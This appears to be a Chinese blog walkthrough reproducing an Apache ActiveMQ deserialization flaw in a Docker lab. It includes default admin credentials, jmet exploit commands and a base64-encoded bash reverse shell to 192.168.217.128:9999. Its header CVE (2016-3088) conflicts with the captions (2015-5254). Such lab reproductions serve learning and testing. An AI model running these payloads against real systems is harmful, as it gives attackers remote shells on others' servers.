CVE-2016-3088
一、环境搭建
Java:jdk8
影响版本 Apache ActiveMQ < 5.13.0
二、用docker搭建漏洞环境
![图片[1] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/15198c56e1a48eaf9328aaa732fefe72.jpeg)
访问一下web界面
![图片[2] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/7948223a1cabab472951d1b63c167132.jpeg)
然后进入admin目录登录
账号:admin
密码:admin
![图片[3] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/a4472ef953af3b7f989ad908897a1730.jpeg)
三、工具准备
cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
![图片[4] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/d57c6fe420b7f042e83ae57f1a28f312.png)
注意:一定要下载external,否则会报错
四、测试漏洞存在
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616
![图片[5] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/09f1798f1db60cace1462c190e959a66.jpeg)
点击触发命令执行
![图片[6] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/b2fa5fc517122981d2c634e7a07d813c.jpeg)
![图片[7] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/ed3d0b76bb38874164d7a2557bdf66a6.jpeg)
查看一下目录,发现创建成功
![图片[8] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/b3d0b2311851356ced40e63da1c652f6.jpeg)
五、getshell
首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。
![图片[9] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/bd6e79dc6643c1990475b9ad3bba70a8.jpeg)
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}” 192.168.217.128 61616
![图片[10] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/375347e61a1a3171bf3ed4b922deda63.jpeg)
最后点击它,触发命令执行
![图片[13] - Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/05d914281caa36ae7ba9bbc4bda731c9.jpeg)
如上图所示即反弹shell成功!
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
